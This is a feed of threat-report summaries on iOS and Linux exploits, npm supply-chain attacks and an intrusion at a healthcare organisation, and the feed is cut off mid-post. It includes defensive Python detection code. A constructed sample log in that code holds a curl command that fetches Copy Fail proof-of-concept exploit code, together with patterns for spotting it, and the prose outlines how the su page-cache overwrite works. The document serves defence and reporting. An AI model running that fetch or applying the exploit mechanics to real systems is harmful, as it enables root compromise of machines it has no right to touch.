#threatreport #MediumCompleteness Coruna iOS Exploit Kit: Observed Traffic Across Education and Government Sectors | 16-03-2026
Source: centripetal.ai/threat-resear…
Key details below ↓
🧑‍💻Actors/Campaigns: Unc6353 (🧠motivation: cyber_espionage, financially_motivated) Unc6691 (🧠motivation: cyber_espionage, financially_motivated) Triangulation Lazarus
💀Threats: Coruna_tool, Watering_hole_technique, Plasmagrid, Corepayload, Eternalblue_vuln, Wannacry, Eternal_petya,
🎯Victims: Education, Government, Finance, Cryptocurrency, Ukraine
🏭Industry: Government, Financial, Education
🌐Geo: Australian, Russian, Iran, China, Chinese, Ukrainian
🔓CVEs:
CVE-2022-48503 \[[Vulners](vulners.com/cve/CVE-2022-485…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - apple safari (<15.6) - apple ipados (<15.6) - apple iphone_os (<15.6) - apple macos (<12.5) ...
CVE-2023-38606 \[[Vulners](vulners.com/cve/CVE-2023-386…)] - CVSS V3.1: *5.5*, - Vulners: Exploitation: True Soft: - apple ipados (<15.7.8, <16.6) - apple iphone_os (<15.7.8, <16.6) - apple macos (<11.7.9, <12.6.8, <13.5) - apple tvos (<16.6) ...
CVE-2024-23222 \[[Vulners](vulners.com/cve/CVE-2024-232…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - apple safari (<17.3) - apple ipados (<15.8.7, <16.7.5, <17.3) - apple iphone_os (<15.8.7, <16.7.5, <17.3) - apple macos (<12.7.3, <13.6.4, <14.3) ...
CVE-2023-32409 \[[Vulners](vulners.com/cve/CVE-2023-324…)] - CVSS V3.1: *8.6*, - Vulners: Exploitation: True Soft: - apple safari (<16.5) - apple ipados (<15.7.8, <16.5) - apple iphone_os (<15.7.8, <16.5) - apple macos (<13.4) ...
CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85)
CVE-2023-32434 \[[Vulners](vulners.com/cve/CVE-2023-324…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - apple ipados (<15.7.7, <16.5.1) - apple iphone_os (<15.7.7, <16.5.1) - apple macos (<11.7.8, <12.6.7, <13.4.1) - apple watchos (<8.8.1, <9.5.2) ...
CVE-2023-41974 \[[Vulners](vulners.com/cve/CVE-2023-419…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - apple ipados (<15.8.7, <17.0) - apple iphone_os (<15.8.7, <17.0)
🤖LLM extracted TTPs: T1005, T1027, T1036, T1041, T1055, T1068, T1070.004, T1071.001, T1082, T1105, ...
🧨IOCs: - Domain: 6
💽Software: iMessage, WhatsApp, macOS
📲Wallets: metamask, tonkeeper
🪙Crypto: uniswap
🔢Algorithms: sha1, aes, lzw, chacha20
🔠Functions: PAC-authenticated
📜Programming Languages: javascript
💻Platforms: apple, intel

#threatreport: The Coruna exploit kit, also referred to as CryptoWaters, has been identified as an advanced exploitation framework targeting iOS devices, specifically iPhone models operating on iOS versions ranging from 13.0 to 17.2.1. This kit encompasses a total of 23 individual exploits and is notable for its association with different threat actors, including commercial surveillance customers and two groups: UNC6353, linked to Russian espionage, and UNC6691, identified as a financially motivated Chinese actor. This framework marks a significant leap in the mass exploitation of iOS devices using sophisticated tools typically reserved for nation-state adversaries. The exploit kit's chain involves numerous vulnerabilities, such as CVE-2024-23222 for remote code execution, CVE-2023-41974—a kernel use-after-free vulnerability added to CISA's catalog, and several others exploited in earlier campaigns like Operation Triangulation.

The exploit lifecycle begins when a user visits a malicious site, where they encounter an injected iframe that exploits WebKit vulnerabilities and subsequently escalates privilege through kernel vulnerabilities. The Coruna framework is capable of performing multiple validations and traverses through several stages, ensuring a comprehensive exploit architecture that eventually injects payloads into critical system processes. One of the main payloads associated with Coruna is PLASMAGRID, which utilizes the identifier com.apple.assistd. This payload acts as a stager that injects itself into the root-level iOS powerd daemon and establishes a command and control (C2) communication channel. Its capabilities include exfiltrating sensitive data such as images and notes, particularly focusing on cryptocurrency-related content, while also being capable of gathering additional personal data from compromised devices. Despite its capabilities, the malware lacks persistence, meaning it resides in RAM and requires user interaction (revisiting malicious websites) for reinfection. Research indicates that the Coruna kit uses advanced techniques to bypass iOS security measures, specifically Apple's Pointer Authentication Code. The kit features meticulous documentation and employs well-structured exploits, hinting at a level of sophistication consistent with professional development practices. The distribution strategy of UNC6691, targeting a wide array of cryptocurrency and financial websites for its infectious exploits, demonstrates a shift from targeted attacks to a broader, indiscriminate exploitation approach, maximizing the potential victim pool. Organizations are urged to take immediate action by ensuring that all devices are updated to the latest iOS version and implementing Lockdown Mode where updates cannot be applied.

Traffic analysis from impacted environments highlights the urgent need for patch management and monitoring for specific indicators outlined in the exploit framework. With the rapidly evolving nature of this exploit, ongoing vigilance and adaptive network defense strategies are vital to mitigate potential threats posed by the Coruna exploit kit.
May 20
#threatreport #MediumCompleteness Observed PCPJack and infected npm packages, new attacks targeting peninsula, several vulnerabilities reported | 18-05-2026
Source: telsy.com/osservato-pcpjack-…
Key details below ↓
🧑‍💻Actors/Campaigns: Teampcp Mini_shai-hulud
💀Threats: Pcpjack_tool, Supply_chain_technique, Trickmo, Smishing_technique, Nightmare_eclipse_tool, Yellowkey_vuln, Greenplasma_vuln,
🎯Victims: Cloud infrastructure, Software supply chain, Software development, Banking, Financial technology, Digital wallets, Authentication services, Jewelry
🏭Industry: Financial, Transport
🌐Geo: Italia, France, Middle east, Austria, Italy
🔓CVEs:
CVE-2026-6973 \[[Vulners](vulners.com/cve/CVE-2026-697…)] - CVSS V3.1: *7.2*, - Vulners: Exploitation: True Soft: - ivanti endpoint_manager_mobile (<12.6.1.1, 12.7.0.0, 12.8.0.0)
CVE-2026-34486 \[[Vulners](vulners.com/cve/CVE-2026-344…)] - CVSS V3.1: *7.5*, - Vulners: Exploitation: Unknown Soft: - apache tomcat (9.0.116, 10.1.53, 11.0.20)
CVE-2026-23918 \[[Vulners](vulners.com/cve/CVE-2026-239…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: Unknown Soft: - apache http_server (2.4.66)
CVE-2026-42231 \[[Vulners](vulners.com/cve/CVE-2026-422…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: Unknown Soft: - n8n (<1.123.32, <2.17.4, 2.18.0)
CVE-2026-42945 \[[Vulners](vulners.com/cve/CVE-2026-429…)] - CVSS V3.1: *8.1*, - Vulners: Exploitation: True
CVE-2026-43284 \[[Vulners](vulners.com/cve/CVE-2026-432…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.255, <5.15.205, <6.1.171, <6.6.138, <6.12.87)
🤖LLM extracted TTPs: T1056.001, T1056.002, T1070.004, T1111, T1113, T1190, T1195.001, T1195.002, T1486, T1518, ...
💽Software: Linux, TanStack, Jenkins, Android, WhatsApp, Ivanti, NGINX, Apache Tomcat
🪙Crypto: bitcoin
🔢Algorithms: zip

#threatreport: Recent cyber threat activity has centered around credential theft campaigns, newly discovered vulnerabilities, and incidents targeting various sectors.

One notable development is the emergence of the PCPJack worm, which specifically targets credential theft from Linux cloud infrastructures. Unlike traditional cloud worms that often engage in cryptomining, PCPJack’s focus is on financial fraud, spam, extortion, or the resale of stolen credentials. This attack mode aligns with a broader trend of supply chain attacks, evidenced by the compromise of the jdownloader.org site, where attackers redirected legitimate software installer links to malicious files without accessing the server's file system. Further notable incidents include a series of malicious activities against the npm registry linked to the TeamPCP group. In May 2026, researchers observed the release of 84 malicious package versions, including a compromised version of the widely used @tanstack/react-router, which could have affected millions of developers. This was part of the Mini Shai-Hulud campaign, highlighting persistent risks associated with software supply chains. Additionally, Checkmarx experienced a similar attack that targeted their AST Scanner plugin for Jenkins, crucial for security analysis in CI/CD pipelines, putting numerous development environments at risk. In Italy, there has been an uptick in cybercrime targeting financial applications, particularly through the deployment of a new variant of the TrickMo banking trojan. This variant, also referred to as TrickMo C, employs credential phishing tactics via fullscreen overlays, keylogging, and notification suppression to capture sensitive user data. Concurrently, fourteen smishing campaigns using the INPS name have been documented, aimed at collecting credit card information for unauthorized transactions, marking a shift toward financial rather than identity theft. A separate phishing scheme exploiting highway toll payments further indicates a deliberate strategy to gather payment card data. Vulnerability disclosures have also been significant.

A critical exploit for the Dirty Frag vulnerability in the Linux kernel (CVE-2026-43284) has emerged, which can be exploited with a high success rate and does not require critical timing conditions. More concerning is the long-standing vulnerability in F5's NGINX web server (CVE-2026-42945), a heap-based buffer overflow that poses serious risks including denial-of-service and possibly remote code execution. Additional vulnerabilities have been disclosed affecting Apache servers and the n8n platform, with public proof-of-concept exploits available. Furthermore, Ivanti has addressed multiple weaknesses, including a zero-day issue (CVE-2026-6973) exploited in the wild. Lastly, two unpatched zero-day vulnerabilities in Microsoft Windows, termed YellowKey and GreenPlasma, have been disclosed, prompting the need for heightened security measures while awaiting official patches. Organizations are advised to enhance their security postures accordingly.
#threatreport #MediumCompleteness How Dirty Frag rose from the Copy Fail exploit | 12-05-2026
Source: reversinglabs.com/blog/dirty…
Key details below ↓
💀Threats: Copyfail_vuln, Multiverze, Dirtyfrag_vuln, Dirty_pipe_vuln, Supply_chain_technique,
🎯Victims: Linux systems, Software supply chain, Developer environments, Open source package ecosystem
🔓CVEs:
CVE-2022-0847 \[[Vulners](vulners.com/cve/CVE-2022-084…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.102, <5.15.25, <5.16.11)
CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85)
📚TTPs: ⚔️Tactics: 2 🛠️Technics: 4
🧨IOCs: - Hash: 24 - File: 1
💽Software: Linux, Twitter, Ubuntu, Unix, Debian
🔢Algorithms: sha256, zip
🔠Functions: b0, Shellcode
📜Programming Languages: python
YARA: Found

#threatreport: ReversingLabs (RL) has highlighted the exploitation of the CVE-2026-31431 vulnerability, also known as Dirty Frag or Copy Fail, which is a local privilege escalation vulnerability in the Linux kernel. This vulnerability, which gained significant attention after a broken embargo in May 2026, allowed attackers to exploit the kernel's page cache in a manner reminiscent of the Dirty Pipe vulnerabilities (CVE-2022-0847). Following the documentation of this flaw, RL identified 163 distinctive malicious samples linked to it, indicating a substantial preemptive exploitation phase at least nine days prior to public notification and fix deployment by Ubuntu. The analyzed samples include both traditional ELF binaries and Python-based scripts, encompassing a range of malicious formats under the exploit tags associated with CVE-2026-31431 and the separate categorization for samples derived from the V4bel/dirtyfrag reference found on GitHub.

Specifically, 148 samples are tracked under the exploit tag for CVE-2026-31431, with recognizable names including Linux.Exploit.CVE-2026-31431, while 15 samples from the V4bel implementation are tagged under Linux.Exploit.DirtyFrag. The research details a surge in malicious samples beginning on May 1, 2026, underscoring a growing interest in exploiting this vulnerability. The detection of malicious behavior is facilitated by YARA rules developed by RL, aimed at identifying the specific shellcode patterns linked to the V4bel reference implementation. These patterns utilize standard techniques for executing a shell via syscall 59, executed without null byte insertion, which is commonly employed in position-independent shellcode development. However, it is important to note that while these YARA rules effectively correlate with ELF binaries, they do not cover Python-script and PyPI-wheel variants, which require alternative detection methodologies. RL's findings suggest significant operational value for defenders, as their developed YARA rules can be implemented in existing security infrastructures for real-time threat detection. With numerous samples classified as malicious even before widely accepted antivirus signatures captured the exploit, the potential for unmitigated risks within Linux environments remains high. The analytical tools offered by RL, such as Spectra Analyze, can enable continuous scanning efforts on newly submitted ELF files, ensuring rapid adaptation to emerging threats.
#threatreport #MediumCompleteness 'Copy Fail' Flaw: 5 YARA Rules for Detection | 02-05-2026
Source: reversinglabs.com/blog/copy-…
Key details below ↓
💀Threats: Copyfail_vuln,
🎯Victims: Server infrastructure, Cloud computing, Enterprise workloads, Multi tenant servers, Ci/cd pipelines, Container clusters
🔓CVEs:
CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85)
📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0
🤖LLM extracted TTPs: T1027, T1027.002, T1027.008, T1027.009, T1059.004, T1059.006, T1068, T1105, T1548.001, T1611, ...
🧨IOCs: - File: 2 - Hash: 21
💽Software: Linux, Twitter, Ubuntu, Kubernetes, curl, PyInstaller
🔢Algorithms: aes, sha256, sha1, hmac, cbc
🔠Functions: splice, sendmsg
🗂️Win API: PIE
📜Programming Languages: javascript, python
💻Platforms: riscv64, amd64, arm
YARA: Found

#threatreport: The Copy Fail vulnerability, assigned CVE-2026-31431, is a critical local privilege escalation flaw found in the Linux kernel and was disclosed by Theori on April 29, 2026. It affects all major Linux distributions released since 2017 and allows any user with a local account to gain full administrative control without the need for passwords or any special tools. The exploit is a minimal 732-byte Python script that can be reliably executed on any affected system. The underlying mechanism of Copy Fail is a logic bug involving the kernel's support for cryptographic templates, specifically reachable through the AF_ALG socket interface. By manipulating this interface, an attacker can perform a controlled write operation that can affect essential files, including setuid binaries like /usr/bin/su. This exploit is exceptionally dangerous in environments where multiple users or workloads share the same kernel, such as multi-tenant servers and container clusters. The scope of the vulnerability encompasses Linux kernel versions 4.14 through 7.0-rc.

Although patches are available, they had not been deployed across all distributions at the time of the disclosure. The ease of exploitation means that systems remain exposed until they are updated. The attack can escalate quickly if an attacker already has access to the Linux environment. ReversingLabs reported that they had identified several instances of the vulnerable exploit shortly after its public disclosure, including four distinct Python samples derived from the original proof of concept. These samples were variations of the initial script, exhibiting changes such as altered line endings or minor whitespace adjustments that did not influence their functionality. This variation indicates the limitations of hash-based detection methods, as the same underlying code can yield different hashes with trivial modifications. In response, ReversingLabs developed targeted YARA rules to combat the Copy Fail threat. These ranged from high-confidence rules that detect exact matches of the original proof of concept to broader rules aimed at identifying variants and compiled ELF binaries associated with the same exploit. One notable derived work is a C implementation called goodcopy.c, which allows for targeting different architectures and includes enhanced cleanup measures to reset the page cache post-exploitation, thereby preventing follow-up attacks.
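The hash-evasion point in the post above (a re-saved copy with different line endings or whitespace gets a new SHA-256) can be countered by hashing a normalised token stream instead of raw bytes. The following is an added example and not ReversingLabs' code; the sample scripts are constructed benign stand-ins, not the Copy Fail proof of concept.

```python
"""Cluster Python script variants by a whitespace- and comment-insensitive hash.

Added example (not ReversingLabs' code). Cosmetic edits (CRLF line endings,
tabs vs spaces, comments, spacing) defeat raw hash matching; hashing the
token stream makes such variants collide while a real code change does not.
The sample scripts below are constructed benign stand-ins, not the PoC.
"""
import hashlib
import io
import tokenize

# Token kinds that carry no program meaning: comments, blank lines, line
# terminators and the end marker. INDENT/DEDENT stay (they are grammar).
_IGNORED = {tokenize.COMMENT, tokenize.NL, tokenize.NEWLINE, tokenize.ENDMARKER}


def raw_sha256(data: bytes) -> str:
    """Conventional file hash; changes with any byte-level edit."""
    return hashlib.sha256(data).hexdigest()


def normalised_tokens(data: bytes) -> list:
    """Return (token_type, text) pairs that affect behaviour.

    Line endings are unified first; comments, blank lines and spacing produce
    no tokens; INDENT text (spaces vs tabs, width) is replaced by a marker.
    """
    text = data.decode("utf-8", errors="replace")
    text = text.replace("\r\n", "\n").replace("\r", "\n")
    out = []
    for tok in tokenize.generate_tokens(io.StringIO(text).readline):
        if tok.type in _IGNORED:
            continue
        if tok.type == tokenize.INDENT:
            out.append((tok.type, "<indent>"))
        else:
            out.append((tok.type, tok.string))
    return out


def normalised_sha256(data: bytes) -> str:
    """SHA-256 over the normalised token stream; falls back to the raw hash
    when the input is not tokenisable Python, so nothing is silently skipped."""
    try:
        tokens = normalised_tokens(data)
    except (tokenize.TokenError, SyntaxError):
        return raw_sha256(data)
    h = hashlib.sha256()
    for ttype, text in tokens:
        h.update(f"{ttype}:{text}\0".encode())
    return h.hexdigest()


# Constructed samples: one benign script in three cosmetic variants plus one
# functionally different script (sum replaced by max).
SAMPLE_ORIGINAL = (
    b"import sys\n\n"
    b"def total(args):\n"
    b"    return sum(int(a) for a in args)\n\n"
    b"print(total(sys.argv[1:]))\n"
)
SAMPLE_CRLF = SAMPLE_ORIGINAL.replace(b"\n", b"\r\n")  # Windows line endings
SAMPLE_WHITESPACE = (  # tab indent, a comment, extra spacing, no final newline
    b"import sys\n"
    b"# helper\n"
    b"def total( args ):\n"
    b"\treturn sum( int(a)   for a in args )  \n\n\n"
    b"print(total(sys.argv[1:]))"
)
SAMPLE_DIFFERENT = SAMPLE_ORIGINAL.replace(b"sum(", b"max(")

SAMPLES = {
    "original": SAMPLE_ORIGINAL,
    "crlf": SAMPLE_CRLF,
    "whitespace": SAMPLE_WHITESPACE,
    "different": SAMPLE_DIFFERENT,
}


def cluster(samples: dict) -> dict:
    """Group sample names by normalised hash: one bucket per real variant."""
    groups = {}
    for name, data in samples.items():
        groups.setdefault(normalised_sha256(data), []).append(name)
    return groups


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:10s} raw={raw_sha256(data)[:12]} norm={normalised_sha256(data)[:12]}")
    print(cluster(SAMPLES))
```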
#threatreport #LowCompleteness Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. | 30-04-2026
Source: xint.io/blog/copy-fail-linux…
Key details below ↓
💀Threats: Copyfail_vuln, Dirty_cow_vuln, Dirty_pipe_vuln,
🎯Victims: Linux distributions, Kubernetes platforms, Cloud computing
🔓CVEs:
CVE-2016-5195 \[[Vulners](vulners.com/cve/CVE-2016-519…)] - CVSS V3.1: *7.0*, - Vulners: Exploitation: True Soft: - canonical ubuntu_linux (12.04, 14.04, 16.04, 16.10)
CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85)
CVE-2022-0847 \[[Vulners](vulners.com/cve/CVE-2022-084…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.102, <5.15.25, <5.16.11)
📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0
🤖LLM extracted TTPs: T1059.006, T1068, T1548.001, T1611
🧨IOCs: - File: 5
💽Software: Linux, Ubuntu, Kubernetes, Android
🔢Algorithms: aes, hmac, sha256, cbc
🔠Functions: splice, read, mmap, execve, recvmsg, sg_chain, crypto_authenc_esn_decrypt, crypto_authenc_esn_decrypt_tail, sendmsg, recv, ...
📜Programming Languages: python

#threatreport: CVE-2026-31431, identified as "Copy Fail," is a critical logic vulnerability in the Linux kernel’s authentication encryption template, which enables an unprivileged local user to perform a controlled 4-byte write into the page cache of any readable file. This vulnerability was disclosed by Xint Code and is applicable across all major Linux distributions, including Ubuntu, Amazon Linux, RHEL, and SUSE. The exploit can be executed with a simple 732-byte Python script, leveraging functionalities from standard library modules, making it particularly notable for its simplicity and portability. The root of "Copy Fail" lies within the Linux kernel’s handling of cryptographic operations combined with page cache management.

Specifically, the exploit manipulates the AF_ALG interface, widely used for cryptography, to execute a deterministic write that alters the page cache without racing conditions or erroneous timing windows. This straightforward approach distinguishes it from previous privilege escalation vulnerabilities like "Dirty Cow" and "Dirty Pipe," which involved more complex conditions and specific version dependencies. The mechanism of exploitation involves a targeted write into the page cache of a setuid binary, specifically /usr/bin/su, which is present in the major distributions since 2017. The attack operates by constructing a payload that is sent in chunks through sendmsg() and splice(), where particular parameters are carefully chosen to ensure the payload is inserted into the system's binaries. Once the payload is injected, executing the modified binary grants root access. Additionally, the implications of this vulnerability extend beyond mere local privilege escalation; the shared nature of the page cache allows for a potential container escape, impacting Kubernetes environments substantially. Therefore, Copy Fail poses a significant risk, especially in multi-tenant cloud infrastructures where a compromised container could lead to broader system access. The vulnerability was reported to the Linux kernel security team in March 2026 and swiftly acknowledged, with patches proposed and committed to the mainline kernel shortly thereafter, demonstrating a proactive response to mitigating the risk. Public disclosure occurred on April 29, 2026, following the establishment of an effective remediation timeline.
#threatreport #LowCompleteness Copy Fail: Universal Linux Local Privilege Escalation Vulnerability | 01-05-2026
Source: wiz.io/blog/copyfail-cve-202…
Key details below ↓
💀Threats: Copyfail_vuln,
🎯Victims: Linux systems
🔓CVEs:
CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85)
🤖LLM extracted TTPs: T1068, T1105, T1548.001
🧨IOCs: - File: 2 - Hash: 1
💽Software: Linux, Ubuntu, Debian, Fedora, curl
🔠Functions: splice
💻Platforms: intel

#threatreport: The Copy Fail vulnerability, identified as CVE-2026-31431, poses a significant threat to Linux systems by allowing local unprivileged users to escalate their privileges to root. This vulnerability, discovered by Xint, applies to nearly all versions of the Linux kernel released since 2017, potentially risking millions of installations. As of May 1, 2026, the patch for this vulnerability has been integrated into the upstream Linux kernel, but numerous distributions have yet to implement these fixes. Copy Fail arises from a logic flaw within the Linux kernel's AEAD crypto implementation. Specifically, the error is associated with how scatter-gather lists are processed. This mismanagement enables attackers to overwrite four bytes in the page cache of any readable file on the system, including critical executables such as setuid binaries. By combining this flaw with AF_ALG sockets and the splice() system call, an attacker can leverage this to gain elevated privileges effectively. Linux distributions are responding at varying rates. For example, Debian's sid (unstable) branch has been patched, while stable releases remain vulnerable without confirmed backport fixes. Other distributions, such as Ubuntu and CloudLinux, have not issued patches as of the specified date, whereas Fedora, RHEL, and others are in the process of rolling out fixes.

Arch Linux, following a rolling release model, appears to have implemented the necessary patches promptly. Monitoring systems for signs of exploitation is crucial. One indicator is the logging of the message "NET: Registered PF_ALG protocol family" in kern.log and syslog, which is standard during boot and legitimate application operations but may require further investigation when associated with other suspicious activities. Additionally, interactions with Xint's website, which hosts Proof of Concept (PoC) exploit code for the vulnerability, should be logged, particularly curl commands querying the site at copy.fail/exp. Internal testing has shown that executing a page-cache-modified version of /usr/bin/su can introduce anomalies in authentication logs, leading to entries that lack the caller's identity. This absence suggests that the exploitation attempt could corrupt the binary's runtime state, further complicating forensic analysis post-compromise. It is essential for organizations relying on Linux systems to prioritize the mitigation of this vulnerability by applying the latest patches and monitoring for related anomalous activities.
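The three indicators the post above lists (PF_ALG registration, requests to copy.fail/exp, and su session entries with no caller identity) can be hunted for together in syslog-style logs. This is an added example and not Wiz's tooling; the log lines, the 120-second boot grace window, the pam_unix-style su line layout and the "cmdlog" command-logging source are constructed assumptions.

```python
"""Hunt for the Copy Fail indicators named in the post in syslog-style logs.

Added example (not Wiz's tooling). Three checks:
  1. "NET: Registered PF_ALG protocol family" outside the boot window
     (at boot it is routine, so only later registrations are reported);
  2. any logged command line referencing copy.fail, the PoC host in the post;
  3. su session lines whose caller field is empty, the anomaly the post
     describes for a page-cache-modified /usr/bin/su.
Assumptions: BSD syslog line layout, a 120 s boot grace window, pam_unix-style
su lines, and a command-logging source called "cmdlog". All log lines below
are constructed samples.
"""
import re
from datetime import datetime, timedelta

SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[^\s:\[]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
# Matches "session opened for user root by alice(uid=1000)"; caller may be empty.
SU_SESSION_RE = re.compile(
    r"session opened for user (?P<target>[^\s(]+)(?:\(uid=\d+\))? "
    r"by (?P<caller>[^\s(]*)\(uid=\d+\)"
)
BOOT_GRACE = timedelta(seconds=120)  # assumed: PF_ALG this soon after boot is routine
LOG_YEAR = 2026                      # syslog timestamps omit the year


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(f"{LOG_YEAR} {ts}", "%Y %b %d %H:%M:%S")


def find_indicators(lines) -> list:
    """Return (kind, line) findings in log order; unparseable lines are skipped."""
    findings = []
    boot_at = None
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts, prog, msg = parse_ts(m["ts"]), m["prog"], m["msg"]
        if prog == "kernel" and msg.startswith("Linux version"):
            boot_at = ts  # the kernel banner marks the start of the boot window
        elif prog == "kernel" and "Registered PF_ALG protocol family" in msg:
            # af_alg loading hours after boot means something opened an AF_ALG
            # socket then. If af_alg is built into the kernel no message is
            # ever logged, so the absence of this finding proves nothing.
            if boot_at is None or ts - boot_at > BOOT_GRACE:
                findings.append(("pf_alg_outside_boot", line))
        if "copy.fail" in msg.lower():
            findings.append(("copy_fail_reference", line))
        if prog == "su":
            sm = SU_SESSION_RE.search(msg)
            if sm and not sm["caller"]:
                findings.append(("su_missing_caller", line))
    return findings


# Constructed sample log: a normal boot, a normal su by alice, then the three
# indicators in sequence during the afternoon.
SAMPLE_LOG = """\
Apr 30 08:00:01 web01 kernel: Linux version 6.12.0-sample (constructed build banner)
Apr 30 08:00:03 web01 kernel: NET: Registered PF_ALG protocol family
Apr 30 08:00:09 web01 systemd[1]: Started Session 1 of user alice.
Apr 30 13:41:52 web01 su[4321]: pam_unix(su:session): session opened for user root by alice(uid=1000)
Apr 30 13:42:10 web01 kernel: NET: Registered PF_ALG protocol family
Apr 30 13:42:11 web01 cmdlog[4410]: uid=1000 cmd="curl https://copy.fail/exp"
Apr 30 13:42:30 web01 su[4450]: pam_unix(su:session): session opened for user root by (uid=1000)
"""

if __name__ == "__main__":
    for kind, line in find_indicators(SAMPLE_LOG.splitlines()):
        print(f"[{kind}] {line}")
```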
the @Linux_Kernel according to GPT-5.5
#threatreport #MediumCompleteness Dead Souls in Infrastructure - Shedding Zmiy's attack on healthcare | 09-04-2026
Source: rt-solar.ru/solar-4rays/blog…
Key details below ↓
🧑‍💻Actors/Campaigns: Shedding_zmiy (🧠motivation: cyber_espionage)
💀Threats: Gsocket_tool, Gs-netcat, Bincryptor_tool, Bulldog_backdoor, Megatsune, Kitsune, Revsocks_tool, Nmap_tool, Mycelium, Leech, Cloudflared_tool, Birdwatch_loader, Garble_tool, Dc_stealer, Bincrypter_tool,
🎯Victims: Healthcare
🏭Industry: Healthcare
🔓CVEs:
CVE-2023-6546 \[[Vulners](vulners.com/cve/CVE-2023-654…)] - CVSS V3.1: *7.0*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<6.5)
📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0
🤖LLM extracted TTPs: T1014, T1027.002, T1041, T1046, T1053.003, T1057, T1068, T1070, T1078, T1083, ...
🧨IOCs: - File: 2 - Hash: 18 - Domain: 6 - IP: 1
💽Software: Telegram, VKontakte, PostgreSQL, Linux, macOS, Unix, Firefox, Chromium, Active Directory
🔢Algorithms: sha256, sha1, md5
🔠Functions: to
📜Programming Languages: rust
💻Platforms: apple

#threatreport: In a recent incident involving the Shedding Zmiy group targeting healthcare infrastructure, attackers maintained access to the network for over six months, utilizing compromised accounts of terminated employees who had not been promptly deactivated. This oversight allowed the threat actors to engage in espionage and conduct various malicious activities. The attackers gained initial access through VPN connections, exploiting a poorly secured PostgreSQL server, allowing for remote command execution using the database's legitimate functions. The attackers deployed malicious utilities, such as gs-netcat, anchoring it within PostgreSQL’s files, which facilitated lateral movement across the network. They utilized various obfuscation techniques, including packing their malware with Bincryptor and UPX.

The Bulldog Backdoor, a known tool of the Shedding Zmiy group, was identified, alongside the Megatsune Rootkit, which is capable of collecting passwords and SSH keys essential for further system access. Moreover, the attacks involved the use of utilities like Nmap for infrastructure scanning, along with privilege escalation and log removal tools to evade detection. The incident highlighted a significant challenge regarding the retrospective analysis of VPN logs, which were insufficient for tracing back six months due to their limited depth. This lack of data rendered the investigation complex, particularly as many suspicious IP addresses belonged to employees who had already been terminated, complicating the attribution of the attacks further. Initial signs of compromise suggest the potential use of phishing to gain access to employee systems. In the evolving landscape of attacks, new versions of Shedding Zmiy's tools and methods were identified. The group had updated their malware to include enhanced functionality such as browser credential stealing and taking screenshots, raising concerns regarding possible attacks on macOS environments as well. A sophisticated Rust-based backdoor was also discovered, indicating the group’s development and adaptation to new technologies. To mitigate such threats, cybersecurity recommendations emphasize the necessity of maintaining an up-to-date inventory of user accounts, deactivating those of terminated employees, and instituting second factor authentication for VPN access. Organizations are encouraged to enhance their VPN logging capabilities, integrating these logs with Security Information and Event Management (SIEM) systems for better detection and response to compromise incidents.
Under the hood of Linux 7.1 🧠💻. The latest kernel updates are all about efficiency and stability. Read more: 👉 tinyurl.com/55hjxh3j #Linux_Kernel #Kernel_Linux
#threatreport #MediumCompleteness Old-School IRC, New Victims: Inside the Newly Discovered SSHStalker Linux Botnet | 09-02-2026
Source: flare.io/learn/resources/blo…
Key details below ↓
💀Threats: Sshstalker, Tsunami_framework, Keiten, Nmap_tool, Logcleaner_tool, Outlaw_botnet, Phoenixminer, Prochider, Ircbot,
🎯Victims: Cloud hosting providers, Linux servers, Oracle cloud infrastructure
🏭Industry: Financial
🌐Geo: Russian, Chinese, German, Asia, French, Apac, Romanian
🔓CVEs:
CVE-2009-2692 \[[Vulners](vulners.com/cve/CVE-2009-269…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.4.37.5, <2.6.30.5)
CVE-2009-2267 \[[Vulners](vulners.com/cve/CVE-2009-226…)] - CVSS V3.1: *6.9*, - Vulners: Exploitation: Unknown Soft: - vmware ace (2.5.0, 2.5.1, 2.5.2) - vmware esx (2.5.5, 3.0.3, 3.5, 4.0) - vmware esxi (3.5, 4.0) - vmware fusion (2.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4) ...
